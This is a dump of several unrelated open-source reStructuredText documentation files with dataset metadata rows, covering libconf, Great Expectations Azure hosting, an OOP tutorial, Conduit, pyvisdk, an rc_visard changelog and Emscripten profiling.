suffix even for numbers within the 32 bit integer range, wrap the integer in a
``LibconfInt64`` class.
Examples::
dumps({'value': 2}) # Returns "value = 2;"
dumps({'value': 2**32}) # Returns "value = 4294967296L;"
dumps({'value': LibconfInt64(2)}) # Explicit int64, returns "value = 2L;"
The second complication arises from distinction between `lists`_ and `arrays`_
in the libconfig language. Lists are enclosed by ``()`` parenthesis, and can
contain arbitrary values within them. Arrays are enclosed by ``[]`` brackets,
and have significant limitations: all values must be scalar (int, float, bool,
string) and must be of the same type.
Libconf uses the following convention:
* it maps libconfig ``()``-lists to Python tuples, which also use the ``()``
syntax.
* it maps libconfig ``[]``-arrays to Python lists, which also use the ``[]``
syntax.
This provides nice symmetry between the two languages, but has the drawback
that dumping Python lists inherits the limitations of libconfig's arrays.
To explicitly control whether lists or arrays are dumped, wrap the Python
list/tuple in a ``LibconfList`` or ``LibconfArray``.
Examples::
# Libconfig lists (=Python tuples) can contain arbitrary complex types:
dumps({'libconf_list': (1, True, {})})
# Libconfig arrays (=Python lists) must contain scalars of the same type:
dumps({'libconf_array': [1, 2, 3]})
# Equivalent, but more explit by using LibconfList/LibconfArray:
dumps({'libconf_list': LibconfList([1, True, {}])})
dumps({'libconf_array': LibconfArray([1, 2, 3])})
Comparison to other Python libconfig libraries
----------------------------------------------
`Pylibconfig2`_ is another pure-Python libconfig reader. It's API
is based on the C++ interface, instead of the Python `json`_ module.
It's licensed under GPLv3, which makes it unsuitable for use in a large number
of projects.
`Python-libconfig`_ is a library that provides Python bindings for the
libconfig++ C++ library. While permissively licensed (BSD), it requires a
compilation step upon installation, which can be a drawback.
I wrote libconf (this library) because both of the existing libraries didn't
fit my requirements. I had a work-related project which is not open source
(ruling out pylibconfig2) and I didn't want the deployment headache of
python-libconfig. Further, I enjoy writing parsers and this seemed like a nice
opportunity :-)
Release notes
-------------
* **2.0.1**, released on 2019-11-21
- Allow trailing commas in lists and arrays for improved compatibility
with the libconfig C implementation. Thanks to nibua-r for reporting
this issue.
* **2.0.0**, released on 2018-11-23
- Output validation for ``dump()`` and ``dumps()``: raise an exception when
dumping data that can not be read by the C libconfig implementation.
*This change may raise exceptions on code that worked with <2.0.0!*
- Add ``LibconfList``, ``LibconfArray``, ``LibconfInt64`` classes for
more fine-grained control of the ``dump()``/``dumps()`` output.
- Fix ``deepcopy()`` of ``AttrDict`` classes (thanks AnandTella).
* **1.0.1**, released on 2017-01-06
- Drastically improve performance when reading larger files
- Several smaller improvements and fixes
* **1.0.0**, released on 2016-10-26:
- Add the ability to write libconf files (``dump()`` and ``dumps()``,
thanks clarkli86 and eatsan)
- Several smaller improvements and fixes
* **0.9.2**, released on 2016-09-09:
- Fix compatibility with Python versions older than 2.7.6 (thanks AnandTella)
.. _libconfig format: http://www.hyperrealm.com/libconfig/libconfig_manual.html#Configuration-Files
.. _json: https://docs.python.org/3/library/json.html
.. _lists: https://hyperrealm.github.io/libconfig/libconfig_manual.html#Lists
.. _arrays: https://hyperrealm.github.io/libconfig/libconfig_manual.html#Arrays
.. _int and int64: https://hyperrealm.github.io/libconfig/libconfig_manual.html#g_t64_002dbit-Integer-Values
.. _Pylibconfig2: https://github.com/heinzK1X/pylibconfig2
.. _Python-libconfig: https://github.com/cnangel/python-libconfig
| 39.04142 | 108 | 0.667778 |
c8d0910d4e4774161c25b4146d2c64be3b0236e9 | 5,619 | rst | reStructuredText | docs/guides/how_to_guides/configuring_data_docs/how_to_host_and_share_data_docs_on_azure_blob_storage.rst | markovml/great_expectations | 0b4b8924a0ee6aff4ffdf235f074a8681ffa1658 | [
"Apache-2.0"
] | 2 | 2022-01-28T15:51:32.000Z | 2022-02-02T05:07:58.000Z | docs/guides/how_to_guides/configuring_data_docs/how_to_host_and_share_data_docs_on_azure_blob_storage.rst | markovml/great_expectations | 0b4b8924a0ee6aff4ffdf235f074a8681ffa1658 | [
"Apache-2.0"
] | null | null | null | docs/guides/how_to_guides/configuring_data_docs/how_to_host_and_share_data_docs_on_azure_blob_storage.rst | markovml/great_expectations | 0b4b8924a0ee6aff4ffdf235f074a8681ffa1658 | [
"Apache-2.0"
] | 1 | 2022-03-27T06:53:38.000Z | 2022-03-27T06:53:38.000Z | .. _how_to_guides__configuring_data_docs__how_to_host_and_share_data_docs_on_azure_blob_storage:
How to host and share Data Docs on Azure Blob Storage
=====================================================
This guide will explain how to host and share Data Docs on Azure Blob Storage.
Data Docs will be served using an Azure Blob Storage static website with restricted access.
.. admonition:: Prerequisites: This how-to guide assumes you have already:
- :ref:`Set up a working deployment of Great Expectations <tutorials__getting_started>`
- Have permission to create and configured an Azure `storage account <https://docs.microsoft.com/en-us/azure/storage>`_
**Steps**
1. **Create an Azure Blob Storage static website.**
- Create a `storage account <https://docs.microsoft.com/en-us/azure/storage>`_.
- In settings Select `Static website <https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blob-static-website-host>`_ to display the configuration page for static websites.
- Select **Enabled** to enable static website hosting for the storage account.
- Write "index.html" in Index document.
Note the Primary endpoint url. Your team will be able to consult your data doc on this url when you have finished this tuto. You could also map a custom domain to this endpoint.
A container called ``$web`` should have been created in your storage account.
2. **Configure the** ``config_variables.yml`` **file with your azure storage credentials**
Get the `Connection string <https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal>`_ of the storage account you have just created.
We recommend that azure storage credentials be stored in the ``config_variables.yml`` file, which is located in the ``uncommitted/`` folder by default, and is not part of source control. The following lines add azure storage credentials under the key ``AZURE_STORAGE_CONNECTION_STRING``. Additional options for configuring the ``config_variables.yml`` file or additional environment variables can be found `here. <https://docs.greatexpectations.io/en/latest/guides/how_to_guides/configuring_data_contexts/how_to_use_a_yaml_file_or_environment_variables_to_populate_credentials.html>`_
.. code-block:: yaml
AZURE_STORAGE_CONNECTION_STRING: "DefaultEndpointsProtocol=https;EndpointSuffix=core.windows.net;AccountName=<YOUR-STORAGE-ACCOUNT-NAME>;AccountKey=<YOUR-STORAGE-ACCOUNT-KEY==>"
3. **Add a new Azure site to the data_docs_sites section of your great_expectations.yml.**
.. code-block:: yaml
data_docs_sites:
local_site:
class_name: SiteBuilder
show_how_to_buttons: true
store_backend:
class_name: TupleFilesystemStoreBackend
base_directory: uncommitted/data_docs/local_site/
site_index_builder:
class_name: DefaultSiteIndexBuilder
az_site: # this is a user-selected name - you may select your own
class_name: SiteBuilder
store_backend:
class_name: TupleAzureBlobStoreBackend
container: \$web
connection_string: ${AZURE_STORAGE_WEB_CONNECTION_STRING}
site_index_builder:
class_name: DefaultSiteIndexBuilder
You may also replace the default ``local_site`` if you would only like to maintain a single Azure Data Docs site.
.. note::
Since the container is called ``$web``, if we simply set ``container: $web`` in ``great_expectations.yml`` then Great Expectations would unsuccefully try to find the variable called ``web`` in ``config_variables.yml``.
We use an escape char ``\`` before the ``$`` so the `substitute_config_variable <https://docs.greatexpectations.io/en/latest/autoapi/great_expectations/data_context/util/index.html?highlight=substitute_config_variable#great_expectations.data_context.util.substitute_config_variable>`_ method will allow us to reach the ``$web`` container.
You also may configure Great Expectations to store your expectations and validations in this Azure Storage account.
You can follow the documentation from the guides :ref:`for expectations <how_to_guides__configuring_metadata_stores__how_to_configure_an_expectation_store_in_azure_blob_storage>` and :ref:`validations <how_to_guides__configuring_metadata_stores__how_to_configure_a_validation_result_store_in_azure_blob_storage>` but unsure you set ``container: \$web`` inplace of other container name.
4. **Build the Azure Blob Data Docs site.**
You can create or modify a suite and this will build the Data Docs website.
Or you can use the following CLI command: ``great_expectations docs build --site-name az_site``.
.. code-block:: bash
> great_expectations docs build --site-name az_site
The following Data Docs sites will be built:
- az_site: https://<your-storage-account>.blob.core.windows.net/$web/index.html
Would you like to proceed? [Y/n]: y
Building Data Docs...
Done building Data Docs
If successful, the CLI will provide the object URL of the index page.
You may secure the access of your website using an IP filtering mecanism.
5. **Limit the access to your company.**
- On your Azure Storage Account Settings click on **Networking**
- Allow access from **Selected networks**
- You can add access to Virtual Network
- You can add IP ranges to the firewall
More details are available `here <https://docs.microsoft.com/en-us/azure/storage/common/storage-network-security?tabs=azure-portal>`_.
.. discourse::
:topic_identifier: 231
| 54.553398 | 587 | 0.747998 |
b96331277bb92c93abed91300eeb8b880f9bfdb5 | 176 | rst | reStructuredText | docs/source/loading-module.rst | Fratorhe/micropyro | 89116ed5548f02e95f38ad26327b15b4bdd73aa8 | [
"BSD-3-Clause"
] | null | null | null | docs/source/loading-module.rst | Fratorhe/micropyro | 89116ed5548f02e95f38ad26327b15b4bdd73aa8 | [
"BSD-3-Clause"
] | 2 | 2020-10-22T11:24:50.000Z | 2020-10-23T10:10:26.000Z | docs/source/loading-module.rst | Fratorhe/micropyro | 89116ed5548f02e95f38ad26327b15b4bdd73aa8 | [
"BSD-3-Clause"
] | null | null | null | ===============
Loading Module
===============
Start by importing micropyro (use abbreviation :code:`mp` to look fancy).
.. code-block:: python
import micropyro as mp
| 14.666667 | 73 | 0.590909 |
ad97ff221507af08ebe36b45456a00912fcb58c4 | 100 | rst | reStructuredText | docs/source/api/python/WaveformNamedResult/index.rst | babycat-io/babycat | 39ecba8469e698a990bc9dc52e5de9ae78492a60 | [
"MIT"
] | 8 | 2021-05-10T23:12:14.000Z | 2022-02-23T06:54:31.000Z | docs/source/api/python/WaveformNamedResult/index.rst | babycat-io/babycat | 39ecba8469e698a990bc9dc52e5de9ae78492a60 | [
"MIT"
] | 13 | 2021-06-01T05:31:17.000Z | 2022-03-25T22:24:18.000Z | docs/source/api/python/WaveformNamedResult/index.rst | babycat-io/babycat | 39ecba8469e698a990bc9dc52e5de9ae78492a60 | [
"MIT"
] | 1 | 2021-06-01T05:24:52.000Z | 2021-06-01T05:24:52.000Z | babycat.WaveformNamedResult
===========================
.. autoclass:: babycat.WaveformNamedResult
| 20 | 42 | 0.61 |
c341cd4761f2ddbdeafc6592f30e121a1e4f1624 | 207 | rst | reStructuredText | doc/basic.rst | FranchuFranchu/digipherals | c6f579083ef469905e5ddfc68feb3fe4e7978e2b | [
"MIT"
] | null | null | null | doc/basic.rst | FranchuFranchu/digipherals | c6f579083ef469905e5ddfc68feb3fe4e7978e2b | [
"MIT"
] | null | null | null | doc/basic.rst | FranchuFranchu/digipherals | c6f579083ef469905e5ddfc68feb3fe4e7978e2b | [
"MIT"
] | null | null | null | basically, to send the command ``set_pixel`` to a peripheral listening at channel ``channel1`` with the arguments ``3, 3, 5``
``digiline_send("channel1", {"set_pixel",3,3,5})`` on a connected luacontroller
| 51.75 | 125 | 0.724638 |
cccfe5eba7f197a0a5994325fdb36d9a53d5ce1f | 157 | rst | reStructuredText | AUTHORS.rst | browniebroke/django-acme | 2e583af980b7969d832d2799ac24f1ac3c6fe36a | [
"MIT"
] | 1 | 2021-02-06T11:13:08.000Z | 2021-02-06T11:13:08.000Z | AUTHORS.rst | adamchainz/django-codemod | 6ab6641568bd3c4a34fd52519ba0d6e926030f44 | [
"MIT"
] | 1 | 2016-12-16T18:44:33.000Z | 2016-12-16T18:44:33.000Z | AUTHORS.rst | adamchainz/django-codemod | 6ab6641568bd3c4a34fd52519ba0d6e926030f44 | [
"MIT"
] | 1 | 2021-02-20T10:29:16.000Z | 2021-02-20T10:29:16.000Z | =======
Credits
=======
Development Lead
----------------
* Bruno Alla <alla.brunoo@gmail.com>
Contributors
------------
None yet. Why not be the first?
| 11.214286 | 36 | 0.535032 |
904e62d8f4add66c195180e44a083f6388a5b0c4 | 9,258 | rst | reStructuredText | chapter/object.rst | Nekroze/codeforthought | 58d4c14ee9b2ba462900a39b72be1abe80ec4e18 | [
"MIT"
] | 2 | 2015-01-22T11:09:08.000Z | 2019-03-18T21:26:21.000Z | chapter/object.rst | Nekroze/codeforthought | 58d4c14ee9b2ba462900a39b72be1abe80ec4e18 | [
"MIT"
] | 1 | 2019-03-18T22:39:12.000Z | 2019-03-18T22:39:12.000Z | chapter/object.rst | Nekroze/codeforthought | 58d4c14ee9b2ba462900a39b72be1abe80ec4e18 | [
"MIT"
] | 1 | 2015-01-22T11:09:08.000Z | 2015-01-22T11:09:08.000Z | The Object of my Desire
=======================
Now we have data that we can store and functions to easily and repeatable
manipulate that data but sometimes it is not enough. Many programming languages
use a paradigm called Object Oriented Programming (commonly referred to as
:term:`OOP`) that allows us to do many cool and complex things in a relatively
elegant way.
The primary feature of :term:`OOP` is... you guessed it, Objects. An object is a named
collection of variables that is used as a template to create a data structure
that performs as specified on demand.
This may sound quite complicated but it just needs to be explained better.
Objects are a great way of conceptualizing real world objects in programming.
Say we wanted to create a representation of a cube in our code. We could use
collection data types like a dictionary or some such to store the data about
our cube. What would be even better, however, is to create an object that
defines how a cube should act and what kind of data it would store.
The first thing that needs to be done is to think about what kind of data we
want to store. For a cube it should have at least a size variable to store,
well, its size. Because we are defining a cube and each side should have the
exact same length we can use one size variable for all of the sides. This is a
fine representation of a cube, albeit very simplistic. Lets also decide we want
to store its position in a three dimensional space. For this we simply need to
store an; X, Y and Z variable to describe its position.
Now enough theory lets have a look at this object in some real code, namely
:term:`Python`.
.. doctest::
>>> class Cube(object):
... def __init__(self):
... self.size = 0
... self.posx = 0
... self.posy = 0
... self.posz = 0
>>> companion = Cube()
>>> companion.size = 10
>>> companion.size
10
OK, some basic things to get out of the way. In :term:`Python` objects should inherit
from the base object, this is why after we name our new "class" (the common name
for an object definition) we place ``(object)`` to denote that this class acts
like an object.
Objects often have "constructors" and sometimes "destructors" these are
functions (or "methods" as they are called when they are part of an object's
definition) that are called when, you guessed it again, the object is
constructed and/or destroyed.
Also often when defining classes/objects and their methods we use the
terms ``self`` or ``this`` to mean this instance of an object.
In the above example we use the :term:`Python` object constructor ``__init__``
that takes an object instance as an argument (``self``) and will give its
variables their default values, in this case the integer ``0``.
Next we assign the variable `companion` as a new instance of the `Cube`
object by calling the object as if it where a function. Finally we set the
`size` variable of our new `Cube` object to ``10`` and finally we show that the
change worked.
Now we can create any number of `Cube` objects each with their own values by
creating a new instance just as we did above with `companion`.
Other languages employ different methods and keywords for using and creating
objects, classes, instances, etc. and is usually very easy to find on the web.
The Layer Cake
--------------
Another very useful feature of :term:`OOP` is Inheritance. What this means is that one
object definition can be based on another, taking all its variables and methods
and building on top of them.
Lets just go straight to an example this time.
.. doctest::
>>> class InSpace(object):
... def __init__(self, posx=0, posy=0, posz=0):
... self.posx = posx
... self.posy = posy
... self.posz = posz
>>> class Cube(InSpace):
... def __init__(self, size, posx=0, posy=0, posz=0):
... super(Cube, self).__init__(posx, posy, posz)
... self.size = size
>>> destination = InSpace(1,posz=5)
>>> destination.posx
1
>>> destination.posy
0
>>> companion = Cube(10)
>>> companion.posx
0
This time we are doing things a little different.
We start off with similar thing to before, we are just creating a new class to
define things that exist in a three dimensional space. However here we are
using default arguments to allow the constructor to optionally take the
position of an `InSpace` object only if it is given, otherwise that dimension
will be ``0``.
Next we define a new `Cube` object, this time instead of inheriting directly
from `object` we inherit from `InSpace`. This means that our new object will
have everything that `InSpace` has and can be used anywhere an `InSpace` object
is expected. For this objects constructor we tell it that we want the size
argument to be required and have the position arguments to default to ``0``
upon creation/initialization of this object.
In some languages, :term:`Python` included, you will need to explicitly call the
constructor of the "parent" object if you want it to be executed. :term:`Python`
uses the ``super`` function to make this a bit easier in :term:`Python` 3 it is
even easier as ``super`` can be called with no arguments to do exactly the same
thing as above, but people are still using both so I show what works
everywhere.
This is more language specific rather then general programming and so is not
something I will go into too deeply. Suffice to say that above we use ``super``
to get the object definition of the parent of `Cube` and then call its
constructor appropriately.
After we have defined our object hierarchy I have just done some example usages
of both classes including different ways to use the optional positional
arguments.
The Method to my Madness
------------------------
Now we can go about doing cooler things like giving special methods that only
cubes can use or even better adding methods to `InSpace` that allows every
object definition that inherits it to easily move around without having to
update its "children" such as `Cube`. In fact lets do just that!
Using the above example, again, any changes in the code to the `InSpace` class
will be reflected in any class that inherits from it (it's children)
accordingly. Because of this we can easily abstract the concepts behind a class
in its base components. So if everything exists in a three dimensional space it
might be a good idea to implement things specific to being in such a space in a
class such as `InSpace` so each object that derives from it does not have to
implement such things over and over again. This leaves each object inheriting
from `InSpace` to focus on what it specifically needs to accomplish it's job.
With this in mind let us redefine the `InSpace` class with some methods to help
us move around in a space.
.. testcode::
class InSpace(object):
def __init__(self, posx=0, posy=0, posz=0):
self.posx = posx
self.posy = posy
self.posz = posz
def move_x(self, distance):
self.posx += distance
def move_y(self, distance):
self.posy += distance
def move_z(self, distance):
self.posz += distance
With this as our new base class we can use the ``move_`` methods from any
object that inherits from `InSpace`.
This means that we can use the `Cube` class as it was defined above and do
``companion.move_x(10)`` to move ``10`` units forward in space and
``companion.move_x(-10)`` to move ``10`` units backwards. Note that in the
function call to move backwards we use ``-10`` for a specific reason.
We could have a method for moving forwards and backwards on each axis but that
may get a little messy. Instead we use a more general approach. When we add the
distance to a variable we use the ``+=`` operator which adds ``distance`` to
the current value of the variable on the left and then stores the result in the
same place. Basically the final two statements are identical.
.. doctest::
>>> position = 0
>>> position = position + 10
>>> position += 10
Now comes the part that we abuse to make the movement three simple methods
instead of six. When you add a negative number (``-10`` in our case) to another
number it will actually perform a minus operation. By using this we can just
hand the move methods positive numbers when we want to move forward on that
axis and a negative integer when we want to move backwards. Neat huh!
This Isn't Even my Final Form
-----------------------------
It doesn't end here. Depending on you needs and what you language of choice
provides you can create powerful base classes and object hierarchies or even
interfaces that you can use to make your code easily re-usable and even
extendable.
Some languages allow a class to inherit from multiple classes at once. In
statically typed languages there is often :term:`Templating` which allows for
you to make a generic class that can be used with any object type. There are
very few problems that cannot be solved using an :term:`OOP` approach.
It sounds complex but this can be super helpful. However just the basics
outlined here is more then enough to get you into the world of :term:`OOP` and open up
a lot of possibilities for better code.
| 43.669811 | 86 | 0.734176 |
916419d6a7e1464a791523dd7a7c553f6334fcdd | 3,894 | rst | reStructuredText | src/docs/sphinx/quick_start.rst | kant/conduit | 420c69805942a77c10fa29f773f101eb61793f04 | [
"BSD-3-Clause"
] | null | null | null | src/docs/sphinx/quick_start.rst | kant/conduit | 420c69805942a77c10fa29f773f101eb61793f04 | [
"BSD-3-Clause"
] | null | null | null | src/docs/sphinx/quick_start.rst | kant/conduit | 420c69805942a77c10fa29f773f101eb61793f04 | [
"BSD-3-Clause"
] | null | null | null | .. ############################################################################
.. # Copyright (c) 2014-2019, Lawrence Livermore National Security, LLC.
.. #
.. # Produced at the Lawrence Livermore National Laboratory
.. #
.. # LLNL-CODE-666778
.. #
.. # All rights reserved.
.. #
.. # This file is part of Conduit.
.. #
.. # For details, see: http://software.llnl.gov/conduit/.
.. #
.. # Please also read conduit/LICENSE
.. #
.. # Redistribution and use in source and binary forms, with or without
.. # modification, are permitted provided that the following conditions are met:
.. #
.. # * Redistributions of source code must retain the above copyright notice,
.. # this list of conditions and the disclaimer below.
.. #
.. # * Redistributions in binary form must reproduce the above copyright notice,
.. # this list of conditions and the disclaimer (as noted below) in the
.. # documentation and/or other materials provided with the distribution.
.. #
.. # * Neither the name of the LLNS/LLNL nor the names of its contributors may
.. # be used to endorse or promote products derived from this software without
.. # specific prior written permission.
.. #
.. # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
.. # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
.. # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
.. # ARE DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY,
.. # LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY
.. # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
.. # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
.. # OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
.. # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
.. # STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
.. # IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
.. # POSSIBILITY OF SUCH DAMAGE.
.. #
.. ############################################################################
.. _getting_started:
================================
Quick Start
================================
Installing Conduit and Third Party Dependencies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The quickest path to install conduit and its dependencies is via :ref:`uberenv <building_with_uberenv>`:
.. code:: bash
git clone --recursive https://github.com/llnl/conduit.git
cd conduit
python scripts/uberenv/uberenv.py --install --prefix="build"
After this completes, ``build/conduit-install`` will contain a Conduit install.
For more details about building and installing Conduit see :doc:`building`. This page provides detailed info about Conduit's CMake options, :ref:`uberenv <building_with_uberenv>` and :ref:`Spack <building_with_spack>` support. We also provide info about :ref:`building for known HPC clusters using uberenv <building_known_hpc>` and a :ref:`Docker example <building_with_docker>` that leverages Spack.
Using Conduit in Your Project
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The install includes examples that demonstrate how to use Conduit in a CMake-based build system and via a Makefile.
CMake-based build system example (see: ``examples/conduit/using-with-cmake``):
.. literalinclude:: ../../examples/using-with-cmake/CMakeLists.txt
:lines: 45-63
:dedent: 2
Makefile-based build system example (see: ``examples/conduit/using-with-make``):
.. literalinclude:: ../../examples/using-with-make/Makefile
:lines: 45-55
:dedent: 2
Learning Conduit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To get starting learning the core Conduit API, see the Conduit Tutorials for :doc:`C++ <tutorial_cpp>` and :doc:`Python <tutorial_python>`.
| 39.333333 | 400 | 0.656651 |
330c4995dc2e98aadf1a9f0e7f8ef1b8aa84cda5 | 1,592 | rst | reStructuredText | docs/source/do/host_multipath_info_logical_unit.rst | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null | docs/source/do/host_multipath_info_logical_unit.rst | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null | docs/source/do/host_multipath_info_logical_unit.rst | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null |
================================================================================
HostMultipathInfoLogicalUnit
================================================================================
.. describe:: Property of
:py:class:`~pyvisdk.do.host_multipath_info.HostMultipathInfo`,
:py:class:`~pyvisdk.do.host_multipath_info_path.HostMultipathInfoPath`
.. describe:: See also
:py:class:`~pyvisdk.do.host_multipath_info_logical_unit_policy.HostMultipathInfoLogicalUnitPolicy`,
:py:class:`~pyvisdk.do.host_multipath_info_logical_unit_storage_array_type_policy.HostMultipathInfoLogicalUnitStorageArrayTypePolicy`,
:py:class:`~pyvisdk.do.host_multipath_info_path.HostMultipathInfoPath`,
:py:class:`~pyvisdk.do.scsi_lun.ScsiLun`
.. describe:: Extends
:py:class:`~pyvisdk.mo.dynamic_data.DynamicData`
.. class:: pyvisdk.do.host_multipath_info_logical_unit.HostMultipathInfoLogicalUnit
.. py:attribute:: id
Identifier of LogicalUnit.
.. py:attribute:: key
Linkable identifier.
.. py:attribute:: lun
The SCSI device corresponding to logical unit.
.. py:attribute:: path
The array of paths available to access this LogicalUnit.
.. py:attribute:: policy
Policy that the logical unit should use when selecting a path.
.. py:attribute:: storageArrayTypePolicy
Policy used to determine how a storage device is accessed. This policy is currently immutable.
| 29.481481 | 138 | 0.608668 |
7a14f66e1216333a425698857e7f5108ee123661 | 5,202 | rst | reStructuredText | rc_visard_driver/CHANGELOG.rst | dragandbot/rc_visard_ros | 9eeace69677867646b211812c2745ee7e26e39b6 | [
"BSD-3-Clause"
] | null | null | null | rc_visard_driver/CHANGELOG.rst | dragandbot/rc_visard_ros | 9eeace69677867646b211812c2745ee7e26e39b6 | [
"BSD-3-Clause"
] | null | null | null | rc_visard_driver/CHANGELOG.rst | dragandbot/rc_visard_ros | 9eeace69677867646b211812c2745ee7e26e39b6 | [
"BSD-3-Clause"
] | 1 | 2019-09-17T09:56:14.000Z | 2019-09-17T09:56:14.000Z | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package rc_visard_driver
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
2.7.0 (2019-07-19)
------------------
* replaced std_srvs/Trigger with rc_common_msgs/Trigger
* add support for setting exposure region via dynamic_reconfigure
2.6.4 (2019-06-19)
------------------
* fix race condition when changing exposure mode from auto to manual
* require ROS version with SteadyTime
* use enums in dynamic reconfigure for easier usage
2.6.3 (2019-06-12)
------------------
2.6.2 (2019-06-11)
------------------
2.6.1 (2019-05-20)
------------------
2.6.0 (2019-05-20)
------------------
* auto-start dynamics only on the very first startup
* improve handling and error messages for dynamics streams
* update exposure and gain after switching from auto to manual
* add check if rc_visard ready (genicam feature: RcSystemReady)
* if multipart is available, still send single components per buffer
* refactoring/cleanup
2.5.0 (2019-02-05)
------------------
* add parameter for max number of reconnections
* fix: enable driver to try to recover even if the very first time no connection worked out
* add diagnostics
* fix reporting of package size
* Fixed hanging image streams after restart of sensor
* Support for rc_visard firmware v1.5.0 additions (require `StereoPlus` license)
* quality full
* advanced smoothing
* improved driver's auto-connect behavior
* also reapply dynamic_reconfigure params after recovery
* fix projection matrix in published right CameraInfo
2.4.2 (2018-10-29)
------------------
2.4.1 (2018-10-29)
------------------
* Fixed link error if rc_genicam_api is not installed in a standard directory
* docker images: upgrade packages first
2.4.0 (2018-10-16)
------------------
* added `depth_acquisition_mode` parameter
* added `depth_acquisition_trigger` service call
* Reduced latency for passing changes of dynamic parameters and topic discriptions to GenICam
* Fixed using wrong disparity range in disparity color publisher
* now depends on rc_genicam_api >= 2.0.0
2.3.0 (2018-08-21)
------------------
* read params from parameter server before falling back to current device params
* New image topics ...out1_low and ...out1_high are offered if iocontrol module is available
2.2.1 (2018-07-05)
------------------
* Changed to component intensity before changing pixel format for supporting color rc_visards with version >= 1.3.0
2.2.0 (2018-07-03)
------------------
* fix out1_mode/out2_mode description and default
* change/add service calls for onboard SLAM module:
- rename `dynamics_reset_slam` to `slam_reset`
- rename `get_trajectory` to `slam_get_trajectory`
- add `slam_save_map`, `slam_load_map` and `slam_remove_map`
* install Rviz example config file
2.1.1 (2018-06-15)
------------------
* Adjusting disparity range to content of disparity image for colored disparity visualization
* Added debug message if left and disparity images cannot be synchronized for creating point clouds
* Implemented parameters for IO control and relaxed time synchronization in case of exposure alternate mode
2.1.0 (2018-04-23)
------------------
* add ptp_enabled dynamic_reconfigure parameter (to enable PrecisionTimeProtocol Slave on rc_visard)
* add reset service for SLAM
* README updates
* use 'rc_visard' as default device name (works with one rc_visard with factory settings connected)
2.0.0 (2018-02-27)
------------------
* rc_genicam_api and rc_dynamics_api as dependency instead of submodule
* don't reset if datastreams time out
* added get_trajectory service
* Use new statemachine interface
Return codes are now strings.
* Add services start_slam, restart_slam and stop_slam
* Publishing dynamics as odometry message
* visualizing dynamics message
- angular velocity, linear accelerarion published as marker
for visualization
- cam2imu-transform is published with re-created timestamp
* Contributors: Christian Emmerich, Felix Endres, Felix Ruess, Heiko Hirschmueller
1.2.1 (2018-02-26)
------------------
* use rc_genicam_api as dependency
instead of including as submodule
also remove launchfile, as the device is a required parameter anyway...
* Contributors: Felix Ruess
1.2.0 (2018-02-11)
------------------
* Setting default of median to 1 instead of 0, which also means off
* install rc_visard_driver node in package lib dir, so start it with `rosrun rc_visard_driver rc_visard_driver`
1.1.3 (2017-04-13)
------------------
* Added possibility to start as ROS node alternatively to nodelet
* Printing shutdown information to stdout, since ROS log messages just before exit disappear
1.1.2 (2017-04-11)
------------------
* The module reconnects to the GigE Vision server in case of errors
* Added reporting enabled componets and missing images
1.1.0 (2017-04-10)
------------------
* Implemented setting camera framerate via dynamic reconfigure
* Implementation of dynamic reconfigure parameters for controlling the depth image
1.0.1 (2017-03-16)
------------------
* Focal length of disparity image now relates to the size of the disparity image
* Use color for point cloud if color images are available
1.0.0 (2017-03-05)
------------------
* Initial release
| 33.346154 | 115 | 0.707805 |
30a067a3977df834fe2d1833c4969f0d86e3f382 | 4,859 | rst | reStructuredText | site/source/docs/optimizing/Profiling-Toolchain.rst | ascorbic/emscripten | 5a8fde885c74311d204a65fc98eef85bc5c072ed | [
"MIT"
] | 6 | 2019-06-29T07:45:50.000Z | 2021-07-10T20:19:18.000Z | site/source/docs/optimizing/Profiling-Toolchain.rst | ascorbic/emscripten | 5a8fde885c74311d204a65fc98eef85bc5c072ed | [
"MIT"
] | 2 | 2019-09-29T00:17:39.000Z | 2019-11-05T01:47:03.000Z | site/source/docs/optimizing/Profiling-Toolchain.rst | ascorbic/emscripten | 5a8fde885c74311d204a65fc98eef85bc5c072ed | [
"MIT"
] | 4 | 2019-08-12T16:08:47.000Z | 2022-01-17T00:08:59.000Z | .. _Profiling-Toolchain:
=======================
Profiling the Toolchain
=======================
The toolchain interacts with a moderate amount of external tools and sublibraries, the exact set generally depends on which compilation and linker flags were used. If you are seeing abnormal compilation times, or if you are developing the Emscripten toolchain itself, it may be useful to profile the toolchain performance itself as it compiles your project. Emscripten has a built-in toolchain wide ``emprofile.py`` profiler that can be used for this purpose.
Quick Example
=============
To try out the toolchain profiler, run the following set of commands:
.. code-block:: bash
cd path/to/emscripten
tools/emprofile.py --reset
export EM_PROFILE_TOOLCHAIN=1
emcc tests/hello_world.c -O3 -o a.html
tools/emprofile.py --graph
